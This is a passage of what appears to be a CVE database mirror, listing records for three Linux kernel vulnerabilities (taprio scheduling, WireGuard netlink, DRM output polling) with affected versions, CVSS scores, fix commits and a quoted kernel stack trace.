              "lessThan": "34d83c3e6e97867ae061d14eb52123404aab1cbc",
              "status": "affected",
              "version": "b5b73b26b3ca34574124ed7ae9c5ba8391a7f176",
              "versionType": "git"
            },
            {
              "lessThan": "b939d1e04a90248b4cdf417b0969c270ceb992b2",
              "status": "affected",
              "version": "b5b73b26b3ca34574124ed7ae9c5ba8391a7f176",
              "versionType": "git"
            },
            {
              "lessThan": "91f249b01fe490fce11fbb4307952ca8cce78724",
              "status": "affected",
              "version": "b5b73b26b3ca34574124ed7ae9c5ba8391a7f176",
              "versionType": "git"
            },
            {
              "lessThan": "fb66df20a7201e60f2b13d7f95d031b31a8831d3",
              "status": "affected",
              "version": "b5b73b26b3ca34574124ed7ae9c5ba8391a7f176",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "83bd58952b2b8543d8c48d1453975ab47a0a7504",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "817ff50796c5e364c879596509f83fcba194bb6f",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/sched/sch_taprio.c",
            "tools/testing/selftests/tc-testing/tc-tests/qdiscs/taprio.json"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.9"
            },
            {
              "lessThan": "5.9",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.119",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.33",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.4",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.119",
                  "versionStartIncluding": "5.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.33",
                  "versionStartIncluding": "5.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.4",
                  "versionStartIncluding": "5.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "5.9",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "5.4.68",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "5.8.12",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: taprio: extend minimum interval restriction to entire cycle too\n\nIt is possible for syzbot to side-step the restriction imposed by the\nblamed commit in the Fixes: tag, because the taprio UAPI permits a\ncycle-time different from (and potentially shorter than) the sum of\nentry intervals.\n\nWe need one more restriction, which is that the cycle time itself must\nbe larger than N * ETH_ZLEN bit times, where N is the number of schedule\nentries. This restriction needs to apply regardless of whether the cycle\ntime came from the user or was the implicit, auto-calculated value, so\nwe move the existing \"cycle == 0\" check outside the \"if \"(!new-\u003ecycle_time)\"\nbranch. This way covers both conditions and scenarios.\n\nAdd a selftest which illustrates the issue triggered by syzbot."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T12:56:19.925Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/34d83c3e6e97867ae061d14eb52123404aab1cbc"
        },
        {
          "url": "https://git.kernel.org/stable/c/b939d1e04a90248b4cdf417b0969c270ceb992b2"
        },
        {
          "url": "https://git.kernel.org/stable/c/91f249b01fe490fce11fbb4307952ca8cce78724"
        },
        {
          "url": "https://git.kernel.org/stable/c/fb66df20a7201e60f2b13d7f95d031b31a8831d3"
        }
      ],
      "title": "net/sched: taprio: extend minimum interval restriction to entire cycle too",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-36244",
    "datePublished": "2024-06-21T10:18:06.373Z",
    "dateReserved": "2024-06-21T10:13:16.319Z",
    "dateUpdated": "2025-11-03T21:55:10.333Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-26950 (GCVE-0-2024-26950)

Vulnerability from cvelistv5 – Published: 2024-05-01 05:18 – Updated: 2025-05-04 09:00

Title

wireguard: netlink: access device through ctx instead of peer

Summary

In the Linux kernel, the following vulnerability has been resolved: wireguard: netlink: access device through ctx instead of peer The previous commit fixed a bug that led to a NULL peer->device being dereferenced. It's actually easier and faster performance-wise to instead get the device from ctx->wg. This semantically makes more sense too, since ctx->wg->peer_allowedips.seq is compared with ctx->allowedips_seq, basing them both in ctx. This also acts as a defence in depth provision against freed peers.

Severity ?

5.5 (Medium)


                        
                          CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-noinfo Not enough information

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/493aa6bdcffd90a4f…
	https://git.kernel.org/stable/c/4be453271a882c8eb…
	https://git.kernel.org/stable/c/09c3fa70f65175861…
	https://git.kernel.org/stable/c/c991567e6c6380793…
	https://git.kernel.org/stable/c/93bcc1752c69bb309…
	https://git.kernel.org/stable/c/d44bd323d8bb8031e…
	https://git.kernel.org/stable/c/71cbd32e3db82ea4a…

Impacted products

Vendor

Product

Version

Linux

Affected: e7096c131e5161fa3b8e52a650d7719d2857adfd , < 493aa6bdcffd90a4f82aa614fe4f4db0641b4068 (git)
Affected: e7096c131e5161fa3b8e52a650d7719d2857adfd , < 4be453271a882c8ebc28df3dbf9e4d95e6ac42f5 (git)
Affected: e7096c131e5161fa3b8e52a650d7719d2857adfd , < 09c3fa70f65175861ca948cb2f0f791e666c90e5 (git)
Affected: e7096c131e5161fa3b8e52a650d7719d2857adfd , < c991567e6c638079304cc15dff28748e4a3c4a37 (git)
Affected: e7096c131e5161fa3b8e52a650d7719d2857adfd , < 93bcc1752c69bb309f4d8cfaf960ef1faeb34996 (git)
Affected: e7096c131e5161fa3b8e52a650d7719d2857adfd , < d44bd323d8bb8031eef4bdc44547925998a11e47 (git)
Affected: e7096c131e5161fa3b8e52a650d7719d2857adfd , < 71cbd32e3db82ea4a74e3ef9aeeaa6971969c86f (git)

Linux

Affected: 5.6
Unaffected: 0 , < 5.6 (semver)
Unaffected: 5.10.215 , ≤ 5.10.* (semver)
Unaffected: 5.15.154 , ≤ 5.15.* (semver)
Unaffected: 6.1.84 , ≤ 6.1.* (semver)
Unaffected: 6.6.24 , ≤ 6.6.* (semver)
Unaffected: 6.7.12 , ≤ 6.7.* (semver)
Unaffected: 6.8.3 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "LOCAL",
              "availabilityImpact": "HIGH",
              "baseScore": 5.5,
              "baseSeverity": "MEDIUM",
              "confidentialityImpact": "NONE",
              "integrityImpact": "NONE",
              "privilegesRequired": "LOW",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-26950",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-06T18:55:56.220490Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "description": "CWE-noinfo Not enough information",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-11-07T15:00:58.528Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:21:05.839Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/493aa6bdcffd90a4f82aa614fe4f4db0641b4068"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4be453271a882c8ebc28df3dbf9e4d95e6ac42f5"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/09c3fa70f65175861ca948cb2f0f791e666c90e5"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c991567e6c638079304cc15dff28748e4a3c4a37"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/93bcc1752c69bb309f4d8cfaf960ef1faeb34996"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d44bd323d8bb8031eef4bdc44547925998a11e47"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/71cbd32e3db82ea4a74e3ef9aeeaa6971969c86f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/wireguard/netlink.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "493aa6bdcffd90a4f82aa614fe4f4db0641b4068",
              "status": "affected",
              "version": "e7096c131e5161fa3b8e52a650d7719d2857adfd",
              "versionType": "git"
            },
            {
              "lessThan": "4be453271a882c8ebc28df3dbf9e4d95e6ac42f5",
              "status": "affected",
              "version": "e7096c131e5161fa3b8e52a650d7719d2857adfd",
              "versionType": "git"
            },
            {
              "lessThan": "09c3fa70f65175861ca948cb2f0f791e666c90e5",
              "status": "affected",
              "version": "e7096c131e5161fa3b8e52a650d7719d2857adfd",
              "versionType": "git"
            },
            {
              "lessThan": "c991567e6c638079304cc15dff28748e4a3c4a37",
              "status": "affected",
              "version": "e7096c131e5161fa3b8e52a650d7719d2857adfd",
              "versionType": "git"
            },
            {
              "lessThan": "93bcc1752c69bb309f4d8cfaf960ef1faeb34996",
              "status": "affected",
              "version": "e7096c131e5161fa3b8e52a650d7719d2857adfd",
              "versionType": "git"
            },
            {
              "lessThan": "d44bd323d8bb8031eef4bdc44547925998a11e47",
              "status": "affected",
              "version": "e7096c131e5161fa3b8e52a650d7719d2857adfd",
              "versionType": "git"
            },
            {
              "lessThan": "71cbd32e3db82ea4a74e3ef9aeeaa6971969c86f",
              "status": "affected",
              "version": "e7096c131e5161fa3b8e52a650d7719d2857adfd",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/wireguard/netlink.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.6"
            },
            {
              "lessThan": "5.6",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.215",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.154",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.84",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.24",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.12",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.215",
                  "versionStartIncluding": "5.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.154",
                  "versionStartIncluding": "5.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.84",
                  "versionStartIncluding": "5.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.24",
                  "versionStartIncluding": "5.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.12",
                  "versionStartIncluding": "5.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.3",
                  "versionStartIncluding": "5.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "5.6",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nwireguard: netlink: access device through ctx instead of peer\n\nThe previous commit fixed a bug that led to a NULL peer-\u003edevice being\ndereferenced. It\u0027s actually easier and faster performance-wise to\ninstead get the device from ctx-\u003ewg. This semantically makes more sense\ntoo, since ctx-\u003ewg-\u003epeer_allowedips.seq is compared with\nctx-\u003eallowedips_seq, basing them both in ctx. This also acts as a\ndefence in depth provision against freed peers."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:00:31.028Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/493aa6bdcffd90a4f82aa614fe4f4db0641b4068"
        },
        {
          "url": "https://git.kernel.org/stable/c/4be453271a882c8ebc28df3dbf9e4d95e6ac42f5"
        },
        {
          "url": "https://git.kernel.org/stable/c/09c3fa70f65175861ca948cb2f0f791e666c90e5"
        },
        {
          "url": "https://git.kernel.org/stable/c/c991567e6c638079304cc15dff28748e4a3c4a37"
        },
        {
          "url": "https://git.kernel.org/stable/c/93bcc1752c69bb309f4d8cfaf960ef1faeb34996"
        },
        {
          "url": "https://git.kernel.org/stable/c/d44bd323d8bb8031eef4bdc44547925998a11e47"
        },
        {
          "url": "https://git.kernel.org/stable/c/71cbd32e3db82ea4a74e3ef9aeeaa6971969c86f"
        }
      ],
      "title": "wireguard: netlink: access device through ctx instead of peer",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-26950",
    "datePublished": "2024-05-01T05:18:29.902Z",
    "dateReserved": "2024-02-19T14:20:24.198Z",
    "dateUpdated": "2025-05-04T09:00:31.028Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-35927 (GCVE-0-2024-35927)

Vulnerability from cvelistv5 – Published: 2024-05-19 10:10 – Updated: 2025-06-19 12:37

Title

drm: Check output polling initialized before disabling

Summary

In the Linux kernel, the following vulnerability has been resolved: drm: Check output polling initialized before disabling In drm_kms_helper_poll_disable() check if output polling support is initialized before disabling polling. If not flag this as a warning. Additionally in drm_mode_config_helper_suspend() and drm_mode_config_helper_resume() calls, that re the callers of these functions, avoid invoking them if polling is not initialized. For drivers like hyperv-drm, that do not initialize connector polling, if suspend is called without this check, it leads to suspend failure with following stack [ 770.719392] Freezing remaining freezable tasks ... (elapsed 0.001 seconds) done. [ 770.720592] printk: Suspending console(s) (use no_console_suspend to debug) [ 770.948823] ------------[ cut here ]------------ [ 770.948824] WARNING: CPU: 1 PID: 17197 at kernel/workqueue.c:3162 __flush_work.isra.0+0x212/0x230 [ 770.948831] Modules linked in: rfkill nft_counter xt_conntrack xt_owner udf nft_compat crc_itu_t nft_fib_inet nft_fib_ipv4 nft_fib_ipv6 nft_fib nft_reject_inet nf_reject_ipv4 nf_reject_ipv6 nft_reject nft_ct nft_chain_nat nf_nat nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 ip_set nf_tables nfnetlink vfat fat mlx5_ib ib_uverbs ib_core mlx5_core intel_rapl_msr intel_rapl_common kvm_amd ccp mlxfw kvm psample hyperv_drm tls drm_shmem_helper drm_kms_helper irqbypass pcspkr syscopyarea sysfillrect sysimgblt hv_balloon hv_utils joydev drm fuse xfs libcrc32c pci_hyperv pci_hyperv_intf sr_mod sd_mod cdrom t10_pi sg hv_storvsc scsi_transport_fc hv_netvsc serio_raw hyperv_keyboard hid_hyperv crct10dif_pclmul crc32_pclmul crc32c_intel hv_vmbus ghash_clmulni_intel dm_mirror dm_region_hash dm_log dm_mod [ 770.948863] CPU: 1 PID: 17197 Comm: systemd-sleep Not tainted 5.14.0-362.2.1.el9_3.x86_64 #1 [ 770.948865] Hardware name: Microsoft Corporation Virtual Machine/Virtual Machine, BIOS Hyper-V UEFI Release v4.1 05/09/2022 [ 770.948866] RIP: 0010:__flush_work.isra.0+0x212/0x230 [ 770.948869] Code: 8b 4d 00 4c 8b 45 08 89 ca 48 c1 e9 04 83 e2 08 83 e1 0f 83 ca 02 89 c8 48 0f ba 6d 00 03 e9 25 ff ff ff 0f 0b e9 4e ff ff ff <0f> 0b 45 31 ed e9 44 ff ff ff e8 8f 89 b2 00 66 66 2e 0f 1f 84 00 [ 770.948870] RSP: 0018:ffffaf4ac213fb10 EFLAGS: 00010246 [ 770.948871] RAX: 0000000000000000 RBX: 0000000000000000 RCX: ffffffff8c992857 [ 770.948872] RDX: 0000000000000001 RSI: 0000000000000001 RDI: ffff9aad82b00330 [ 770.948873] RBP: ffff9aad82b00330 R08: 0000000000000000 R09: ffff9aad87ee3d10 [ 770.948874] R10: 0000000000000200 R11: 0000000000000000 R12: ffff9aad82b00330 [ 770.948874] R13: 0000000000000001 R14: 0000000000000000 R15: 0000000000000001 [ 770.948875] FS: 00007ff1b2f6bb40(0000) GS:ffff9aaf37d00000(0000) knlGS:0000000000000000 [ 770.948878] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 770.948878] CR2: 0000555f345cb666 CR3: 00000001462dc005 CR4: 0000000000370ee0 [ 770.948879] Call Trace: [ 770.948880] <TASK> [ 770.948881] ? show_trace_log_lvl+0x1c4/0x2df [ 770.948884] ? show_trace_log_lvl+0x1c4/0x2df [ 770.948886] ? __cancel_work_timer+0x103/0x190 [ 770.948887] ? __flush_work.isra.0+0x212/0x230 [ 770.948889] ? __warn+0x81/0x110 [ 770.948891] ? __flush_work.isra.0+0x212/0x230 [ 770.948892] ? report_bug+0x10a/0x140 [ 770.948895] ? handle_bug+0x3c/0x70 [ 770.948898] ? exc_invalid_op+0x14/0x70 [ 770.948899] ? asm_exc_invalid_op+0x16/0x20 [ 770.948903] ? __flush_work.isra.0+0x212/0x230 [ 770.948905] __cancel_work_timer+0x103/0x190 [ 770.948907] ? _raw_spin_unlock_irqrestore+0xa/0x30 [ 770.948910] drm_kms_helper_poll_disable+0x1e/0x40 [drm_kms_helper] [ 770.948923] drm_mode_config_helper_suspend+0x1c/0x80 [drm_kms_helper] [ 770.948933] ? __pfx_vmbus_suspend+0x10/0x10 [hv_vmbus] [ 770.948942] hyperv_vmbus_suspend+0x17/0x40 [hyperv_drm] [ 770.948944] ? __pfx_vmbus_suspend+0x10/0x10 [hv_vmbus] [ 770.948951] dpm_run_callback+0x4c/0x140 [ 770.948954] __device_suspend_noir ---truncated---

Severity ?

5.5 (Medium)


                        
                          CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-noinfo Not enough information

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/3d1b47e3a935abd4f…
	https://git.kernel.org/stable/c/18451798f4a4e7418…
	https://git.kernel.org/stable/c/5abffb66d12bcac84…

Impacted products

Vendor

Product

Version

Linux

Affected: 78b991ccfa64a438e2d8c2997d22d55621ab277d , < 3d1b47e3a935abd4f258a945db87e7267ff4079c (git)
Affected: 78b991ccfa64a438e2d8c2997d22d55621ab277d , < 18451798f4a4e7418b9fad7e7dd313fe84b1f545 (git)
Affected: 78b991ccfa64a438e2d8c2997d22d55621ab277d , < 5abffb66d12bcac84bf7b66389c571b8bb6e82bd (git)

Linux

Affected: 6.3
Unaffected: 0 , < 6.3 (semver)
Unaffected: 6.6.27 , ≤ 6.6.* (semver)
Unaffected: 6.8.6 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "LOCAL",
              "availabilityImpact": "HIGH",
              "baseScore": 5.5,
              "baseSeverity": "MEDIUM",
              "confidentialityImpact": "NONE",
              "integrityImpact": "NONE",
              "privilegesRequired": "LOW",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-35927",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-29T18:18:22.364810Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "description": "CWE-noinfo Not enough information",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-10-29T19:54:14.353Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:48.874Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/786c27982a39d79cc753f84229eb5977ac8ef1c1"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4ad8d57d902fbc7c82507cfc1b031f3a07c3de6e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3d1b47e3a935abd4f258a945db87e7267ff4079c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/18451798f4a4e7418b9fad7e7dd313fe84b1f545"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5abffb66d12bcac84bf7b66389c571b8bb6e82bd"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/drm_modeset_helper.c",
            "drivers/gpu/drm/drm_probe_helper.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "3d1b47e3a935abd4f258a945db87e7267ff4079c",
              "status": "affected",
              "version": "78b991ccfa64a438e2d8c2997d22d55621ab277d",
              "versionType": "git"
            },
            {
              "lessThan": "18451798f4a4e7418b9fad7e7dd313fe84b1f545",
              "status": "affected",
              "version": "78b991ccfa64a438e2d8c2997d22d55621ab277d",
              "versionType": "git"
            },
            {
              "lessThan": "5abffb66d12bcac84bf7b66389c571b8bb6e82bd",
              "status": "affected",
              "version": "78b991ccfa64a438e2d8c2997d22d55621ab277d",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/drm_modeset_helper.c",
            "drivers/gpu/drm/drm_probe_helper.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.3"
            },
            {
              "lessThan": "6.3",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.27",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.6",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.27",
                  "versionStartIncluding": "6.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.6",
                  "versionStartIncluding": "6.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "6.3",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm: Check output polling initialized before disabling\n\nIn drm_kms_helper_poll_disable() check if output polling\nsupport is initialized before disabling polling. If not flag\nthis as a warning.\nAdditionally in drm_mode_config_helper_suspend() and\ndrm_mode_config_helper_resume() calls, that re the callers of these\nfunctions, avoid invoking them if polling is not initialized.\nFor drivers like hyperv-drm, that do not initialize connector\npolling, if suspend is called without this check, it leads to\nsuspend failure with following stack\n[  770.719392] Freezing remaining freezable tasks ... (elapsed 0.001 seconds) done.\n[  770.720592] printk: Suspending console(s) (use no_console_suspend to debug)\n[  770.948823] ------------[ cut here ]------------\n[  770.948824] WARNING: CPU: 1 PID: 17197 at kernel/workqueue.c:3162 __flush_work.isra.0+0x212/0x230\n[  770.948831] Modules linked in: rfkill nft_counter xt_conntrack xt_owner udf nft_compat crc_itu_t nft_fib_inet nft_fib_ipv4 nft_fib_ipv6 nft_fib nft_reject_inet nf_reject_ipv4 nf_reject_ipv6 nft_reject nft_ct nft_chain_nat nf_nat nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 ip_set nf_tables nfnetlink vfat fat mlx5_ib ib_uverbs ib_core mlx5_core intel_rapl_msr intel_rapl_common kvm_amd ccp mlxfw kvm psample hyperv_drm tls drm_shmem_helper drm_kms_helper irqbypass pcspkr syscopyarea sysfillrect sysimgblt hv_balloon hv_utils joydev drm fuse xfs libcrc32c pci_hyperv pci_hyperv_intf sr_mod sd_mod cdrom t10_pi sg hv_storvsc scsi_transport_fc hv_netvsc serio_raw hyperv_keyboard hid_hyperv crct10dif_pclmul crc32_pclmul crc32c_intel hv_vmbus ghash_clmulni_intel dm_mirror dm_region_hash dm_log dm_mod\n[  770.948863] CPU: 1 PID: 17197 Comm: systemd-sleep Not tainted 5.14.0-362.2.1.el9_3.x86_64 #1\n[  770.948865] Hardware name: Microsoft Corporation Virtual Machine/Virtual Machine, BIOS Hyper-V UEFI Release v4.1 05/09/2022\n[  770.948866] RIP: 0010:__flush_work.isra.0+0x212/0x230\n[  770.948869] Code: 8b 4d 00 4c 8b 45 08 89 ca 48 c1 e9 04 83 e2 08 83 e1 0f 83 ca 02 89 c8 48 0f ba 6d 00 03 e9 25 ff ff ff 0f 0b e9 4e ff ff ff \u003c0f\u003e 0b 45 31 ed e9 44 ff ff ff e8 8f 89 b2 00 66 66 2e 0f 1f 84 00\n[  770.948870] RSP: 0018:ffffaf4ac213fb10 EFLAGS: 00010246\n[  770.948871] RAX: 